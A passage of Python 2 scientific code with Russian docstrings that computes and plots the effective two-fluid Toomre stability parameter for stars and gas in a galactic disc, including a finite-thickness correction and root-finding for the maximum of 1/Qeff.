'''Двухжидкостный с диском. Для каждого R из r_arcs строим график 1/Qeff по формуле (14) измененной в кинематическое приближение и учитывая конечную толщину диска. Затем находим максимум через решение производной и получаем значение Qeff для каждого R.''' Qeffs = [] plt.figure(15) plt.xlabel(r"$\bar{k}$") plt.ylabel(r"$\frac{1}{Q_eff}$") plt.axhline(y=1) for R in r_arcs: print "#!!!!!!!!!!!!# =========================================" print "#!!!!!!!!!!!!# With disc: Compute 1/Qeff for R =", R ind = r_arcs.index(R) Qs = Qstar(R, poly_gas, star_density[ind], sigma[ind], resolution) Qg = Qgas(R, poly_gas, gas_density[ind], resolution) dimlessK = [dimlessWavenumber(k, R, sigma[ind], poly_gas, resolution) for k in arange(0.01, kmax, 0.01)] s = sound_vel / sigma[ind] print "#!!!!!!!!!!!!# Star density ", star_density[ind], " gas density ", gas_density[ind], " sigma ", sigma[ ind] print "#!!!!!!!!!!!!# Qs ", Qs, " Qg ", Qg, " s ", s, "kappa", epicyclicFreq(poly_gas, R, resolution), " hS ", hzStar[ind], " hG ", hzGas[ind] TFcriteria = [] root_for_max = solveDerivTwoFluidWithDiscQeff(Qs, Qg, s, hzStar[ind], hzGas[ind], epicyclicFreq(poly_gas, R, resolution), sigma[ind], 0.00001, kmax) if root_for_max == -1: krange = arange(0,kmax,0.1) original = [twoFluidWithDiscQeffs(Qs, Qg, s, hzStar[ind], hzGas[ind], epicyclicFreq(poly_gas, R, resolution), sigma[ind], x) for x in krange] root_for_max = krange[original.index(max(original))] max_val = twoFluidWithDiscQeffs(Qs, Qg, s, hzStar[ind], hzGas[ind], epicyclicFreq(poly_gas, R, resolution), sigma[ind], root_for_max) print "#!!!!!!!!!!!!# Max 1/Qeff ", max_val, " and Qeff = ", 1 / max_val for barK in dimlessK: k = barK * epicyclicFreq(poly_gas, R, resolution) / sigma[ind] expStarMultipl = (1 - math.exp(-hzStar[ind] * k)) / (k * hzStar[ind]) expGasMultipl = (1 - math.exp(-hzGas[ind] * k)) / (k * hzGas[ind]) # Для точности используем i0e(x) = exp(-abs(x)) * i0(x) # Возможно использование асимптотики I_0(x) ~ exp(x)/sqrt(2pi*x) oneToQeff = expStarMultipl * (1 - scipy.special.i0e(barK ** 2)) * 2 / (Qs * barK) oneToQeff += expGasMultipl * 2 * s * barK / (Qg * (1 + (s * barK) ** 2)) TFcriteria.append(oneToQeff) plt.plot(dimlessK, TFcriteria, '.', label=str(R)) plt.plot(root_for_max, max_val, 'o') Qeffs.append([R, root_for_max, 1.0 / max_val]) plt.legend() plt.xlim(0, 50) plt.savefig(path + "/qeff_2Fwith_disc.png") return Qeffs def derivTwoFluidQeff(dimlK, Qs, Qg, s): '''Производная по \bar{k} от левой части (13) для того, чтобы найти максимум. Коррекция за ассимптотику производится с помощью встроенных функций бесселя, нормированных на exp.''' part1 = (1 - i0e(dimlK ** 2)) / (-dimlK ** 2) part2 = (2 * dimlK * i0e(dimlK ** 2) - 2 * dimlK * i1e(dimlK ** 2)) / dimlK part3 = (1 - (dimlK * s) ** 2) / (1 + (dimlK * s) ** 2) ** 2 return 2 * (part1 + part2) / Qs + 2 * s * part3 / Qg def derivTwoFluidWithDiscQeff(dimlK, Qs, Qg, s, hs, hg, kappa, sigma): '''Производная по \bar{k} от левой части модифицированного (14) для того, чтобы найти максимум. Коррекция за ассимптотику производится с помощью встроенных функций бесселя, нормированных на exp.''' part1d = (1 - i0e(dimlK ** 2)) / (-dimlK ** 2) + (2 * dimlK * i0e(dimlK ** 2) - 2 * dimlK * i1e(dimlK ** 2)) / dimlK part1d *= 2 / Qs part2 = 2 * (1 - i0e(dimlK ** 2)) / (dimlK * Qs) part3d = (1 - (dimlK * s) ** 2) / (1 + (dimlK * s) ** 2) ** 2 part3d *= 2 * s / Qg part4 = 2 * s * dimlK / (1 + (dimlK * s) ** 2) / Qg exp1s = (1 - math.exp(-dimlK * kappa * hs / sigma)) / (dimlK * kappa * hs / sigma) exp1g = (1 - math.exp(-dimlK * kappa * hg / sigma)) / (dimlK * kappa * hg / sigma) eds = math.exp(-dimlK * kappa * hs / sigma) / dimlK - (1 - math.exp(-dimlK * kappa * hs / sigma)) / ( (dimlK ** 2) * kappa * hs / sigma) edg = math.exp(-dimlK * kappa * hg / sigma) / dimlK - (1 - math.exp(-dimlK * kappa * hg / sigma)) / ( (dimlK ** 2) * kappa * hg / sigma) return part2 * eds + part1d * exp1s + part4 * edg + part3d * exp1g def solveDerivTwoFluidQeff(Qs, Qg, s, eps, kmax): '''Решение уравнения deriv(13) = 0 для нахождения максимума исходной функции. Запускается brentq на исходной сетке, в случае если на концах сетки разные знаки функции (промежуток содержит корень), затем выбираются лучшие корни, после чего ищется, какой их них дает максимум. Возвращается только этот корень.''' grid = arange(0.1, kmax, kmax / 100) args = [Qs, Qg, s] signs = [derivTwoFluidQeff(x, *args) for x in grid] signs = map(lambda x: x / abs(x), signs) roots = [] for i in range(0, signs.__len__() - 1): if signs[i] * signs[i + 1] < 0: roots.append(brentq(lambda x: derivTwoFluidQeff(x, *args), grid[i], grid[i + 1], xtol=eps)) original = [twoFluidQeff(Qs, Qg, s, x) for x in roots] return roots[original.index(max(original))] def solveDerivTwoFluidHydroQeff(Qs, Qg, s, eps, kmax): '''Решение уравнения deriv(9) = 0 для нахождения максимума исходной функции. Запускается brentq на исходной сетке, в случае если на концах сетки разные знаки функции (промежуток содержит корень), затем выбираются лучшие корни, после чего ищется, какой их них дает максимум. Возвращается только этот корень.''' grid = arange(0.1, kmax, kmax / 100) args = [Qs, Qg, s] signs = [derivTwoFluidHydroQeff(x, *args) for x in grid] signs = map(lambda x: x / abs(x), signs) roots = [] for i in range(0, signs.__len__() - 1): if signs[i] * signs[i + 1] < 0: roots.append(brentq(lambda x: derivTwoFluidHydroQeff(x, *args), grid[i], grid[i + 1], xtol=eps)) original = [twoFluidHydroQeff(Qs, Qg, s, x) for x in roots] return roots[original.index(max(original))] def derivTwoFluidHydroQeff(dimlK, Qs, Qg, s): '''Производная по \bar{k} от левой части (9) для того, чтобы найти максимум. Коррекция за ассимптотику производится с помощью встроенных функций бесселя, нормированных на exp.''' part1 = (1 - dimlK ** 2) / (1 + dimlK ** 2) ** 2 part3 = (1 - (dimlK * s) ** 2) / (1 + (dimlK * s) ** 2) ** 2 return (2 * part1 / Qs) + (2 * s * part3 / Qg) def twoFluidQeff(Qs, Qg, s, dimlK): '''Возвращает соcчитанное значение (13).''' return (1 - i0e(dimlK ** 2)) * 2 / (Qs * dimlK) + 2 * s * dimlK / (Qg * (1 + (s * dimlK) ** 2)) def twoFluidHydroQeff(Qs, Qg, s, dimlK): '''Возвращает соcчитанное значение (9).''' return 2 * dimlK / (Qs * (1 + dimlK ** 2)) + 2 * s * dimlK / (Qg * (1 + (s * dimlK) ** 2)) def twoFluidWithDiscQeffs(Qs, Qg, s, hs, hg, kappa, sigma, dimlK): '''Возвращает соcчитанное значение (14).''' k = dimlK * kappa / sigma expStarMultipl = (1 - math.exp(-hs * k)) / (k * hs) expGasMultipl = (1 - math.exp(-hg * k)) / (k * hg) oneToQeff = expStarMultipl * (1 - scipy.special.i0e(dimlK ** 2)) * 2 / (Qs * dimlK) oneToQeff += expGasMultipl * 2 * s * dimlK / (Qg * (1 + (s * dimlK) ** 2)) return oneToQeff def solveDerivTwoFluidWithDiscQeff(Qs, Qg, s, hs, hg, kappa, sigma, eps, kmax): '''Решение уравнения deriv(14) = 0 для нахождения максимума исходной функции. Запускается brentq на исходной сетке, в случае если на концах сетки разные знаки функции (промежуток содержит корень), затем выбираются лучшие корни, после чего ищется, какой их них дает максимум. Возвращается только этот корень.''' grid = arange(0.1, kmax, kmax / 100) args = [Qs, Qg, s, hs, hg, kappa, sigma] signs = [derivTwoFluidWithDiscQeff(x, *args) for x in grid] signs = map(lambda x: x / abs(x), signs) roots = [] for i in range(0, signs.__len__() - 1): if signs[i] * signs[i + 1] < 0: roots.append(brentq(lambda x: derivTwoFluidWithDiscQeff(x, *args), grid[i], grid[i + 1], xtol=eps)) original = [twoFluidWithDiscQeffs(Qs, Qg, s, hs, hg, kappa, sigma, x) for x in roots] if original.__len__() > 0: return roots[original.index(max(original))] else: return -1 def findOneFluidQeffs(r_arcs, poly_gas, gas_density, star_density, sigma, path, resolution, kmax): '''Для каждого R из r_arcs строим график 1/Qeff для критерия Тумре (4), используя безразмерное волновое число. Затем находим максимум через решение производной и получаем значение Qeff.''' Qeffs = [] plt.figure(16) plt.xlabel(r"$R,''$") plt.ylabel(r"$\frac{1}{Q_eff}$") plt.axhline(y=1) for R in r_arcs: print "#!!!!!!!!!!!!# =========================================" print "#!!!!!!!!!!!!# Simple one fluid : Compute 1/Qeff for R =", R ind = r_arcs.index(R) Qs = Qstar(R, poly_gas, star_density[ind], sigma[ind], resolution) Qg = Qgas(R, poly_gas, gas_density[ind], resolution) s = sound_vel / sigma[ind] print "#!!!!!!!!!!!!# Star density ", star_density[ind], " gas density ", gas_density[ind], " sigma ", sigma[ ind] print "#!!!!!!!!!!!!# Qs ", Qs, " Qg ", Qg, " s ", s, "kappa", epicyclicFreq(poly_gas, R, resolution) Qeffs.append(Qg) plt.plot(r_arcs, map(lambda x: 1 / x, Qeffs), '-') plt.legend() plt.xlim(-10, 300) plt.savefig(path + "/qeff_1F.png") return Qeffs